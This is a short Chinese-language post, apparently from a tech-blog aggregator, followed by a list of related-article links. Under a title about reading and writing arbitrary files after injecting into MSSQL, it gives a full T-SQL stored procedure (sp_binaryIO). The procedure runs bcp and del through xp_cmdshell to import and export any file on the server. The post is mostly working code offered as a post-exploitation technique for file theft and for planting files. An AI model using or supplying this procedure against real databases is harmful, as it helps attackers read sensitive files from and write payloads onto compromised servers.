注入mssql後使用儲存過程讀寫任意檔案
建立讀寫二進位制檔案的儲存過程,內容如下:
/*--bcp-二進位制檔案的匯入匯出,呼叫示例 :
create table tb (img image);
--資料匯入
exec sp_binaryIO '.', 'sa', '', 'test..tb', 'img', 'c:/abc.jpg', 0
--資料匯出
exec sp_binaryIO '.', 'sa', '', 'test..tb', 'img', 'c:/a.jpg', 1
drop table tb;
--*/
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_binaryIO]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[sp_binaryIO]
GO
Create proc sp_binaryIO
@servename varchar (30), --伺服器名稱
@username varchar (30), --使用者名稱
@password varchar (30), --密碼
@tbname varchar (500), --資料庫..表名
@fdname varchar (30), --欄位名
@fname varchar (1000), --目錄+檔名
@isout bit=1 --1匯出((預設), 0匯入
AS
declare @fname_in varchar(1000), --bcp處理應答檔名
@fsize varchar(20), --要處理的檔案的大小
@m_tbname varchar(50), --臨時表名
@sql varchar(8000)
--取得匯入檔案的大小
if @isout=1
set @fsize = '0'
else
begin
create table #tb(可選名 varchar(20), 大小 int, 建立日期 varchar(10), 建立時間 varchar(20),
上次寫操作日期 varchar(10), 上次寫操作時間 varchar(20), 上次訪問日期 varchar(10),
上次訪問時間 varchar(20), 特性 int)
insert into #tb exec master..xp_getfiledetails @fname
select @fsize = 大小 from #tb
drop table #tb
if @fsize is null
begin
print '檔案未找到'
return
end
end
--生成資料處理應答檔案
set @m_tbname = '[##temp' + cast(newid() as varchar(40)) + ']'
set @sql = 'select * into ' + @m_tbname + ' from (
select null as 型別
union all select 0 as 字首
union all select ' + @fsize + ' as 長度
union all select null as 結束
union all select null as 格式
) a'
exec(@sql)
select @fname_in = @fname + '_temp',
@sql = 'bcp "' + @m_tbname + '" out "' + @fname_in + '" /S"' + @servename
+ case when isnull(@username,'') = '' then '' else '" /U"' + @username end
+ '" /P"' + isnull(@password, '') + '" /c'
exec master..xp_cmdshell @sql
--刪除臨時表
set @sql = 'drop table ' + @m_tbname
exec(@sql)
if @isout=1
begin
-- 匯出
set @sql = 'bcp "select top 1 ' + @fdname + ' from ' + @tbname
+ '" queryout "' + @fname + '" /S"' + @servename
+ case when isnull(@username,'') = '' then '' else '" /U"' + @username end
+ '" /P"' + isnull(@password,'')
+ '" /i"' + @fname_in + '"'
exec master..xp_cmdshell @sql
end
else
begin
-- 匯入
set @sql = 'bcp "'+ @tbname + '" in "' + @fname
+ '" /S"' + @servename
+ case when isnull(@username,'')='' then '' else '" /U"' + @username end
+ '" /P"' + isnull(@password, '') + '" /i"' + @fname_in + '"'
exec master..xp_cmdshell @sql
end
--刪除資料處理應答檔案
set @sql = 'del ' + @fname_in
exec master..xp_cmdshell @sql
go
有了這個儲存過程就可以讀寫任意的檔案了。
相關文章
- mssql 儲存過程呼叫另一個儲存過程中的結果的方法分享SQL儲存過程
- mssql sqlserver 批量刪除所有儲存過程的方法分享SQLServer儲存過程
- oracle儲存過程書寫格式Oracle儲存過程
- Mysql 儲存過程的使用MySql儲存過程
- 任意檔案讀取
- Springboot整合MongoDB儲存檔案、讀取檔案Spring BootMongoDB
- Laravel 中使用 MySQL 儲存過程LaravelMySql儲存過程
- MySQL的寫入資料儲存過程MySql儲存過程
- 【MSSQL】sqlserver 各種判斷是否存在(表名、函式、儲存過程.......)SQLServer函式儲存過程
- Oracle儲存過程乾貨(一):儲存過程基礎Oracle儲存過程
- SQL 儲存過程裡呼叫另一個儲存過程SQL儲存過程
- 用友任意檔案讀取
- 23. 使用MySQL之使用儲存過程MySql儲存過程
- 儲存過程與儲存函式儲存過程儲存函式
- unidac儲存過程儲存過程
- firedac儲存過程儲存過程
- 呼叫儲存過程儲存過程
- mysql 儲存過程MySql儲存過程
- SQLSERVER儲存過程SQLServer儲存過程
- Oracle儲存過程Oracle儲存過程
- MySQL儲存過程中如何使用ROLLBACKMySql儲存過程
- 在Entity Framework中使用儲存過程Framework儲存過程
- SqlServer儲存過程的建立與使用SQLServer儲存過程
- MySQL儲存過程的建立和使用MySql儲存過程
- 塊儲存 檔案儲存 物件儲存物件
- 使用 Docker 搭建 minio 檔案儲存Docker
- 檔案儲存
- Mysql溯源-任意檔案讀取?MySql
- 資料儲存--檔案儲存
- (slam工具)1檔案讀取和儲存SLAM
- golang 讀取切分儲存byte流檔案Golang
- Oracle儲存過程中跳出迴圈的寫法Oracle儲存過程
- 儲存過程_造使用者資料儲存過程
- SQLServer查詢使用者儲存過程SQLServer儲存過程
- jdbc使用call呼叫儲存過程報錯JDBC儲存過程
- Mysql儲存過程中使用多遊標MySql儲存過程
- MySQL---------儲存過程MySql儲存過程
- 造數儲存過程儲存過程
- linux呼叫儲存過程Linux儲存過程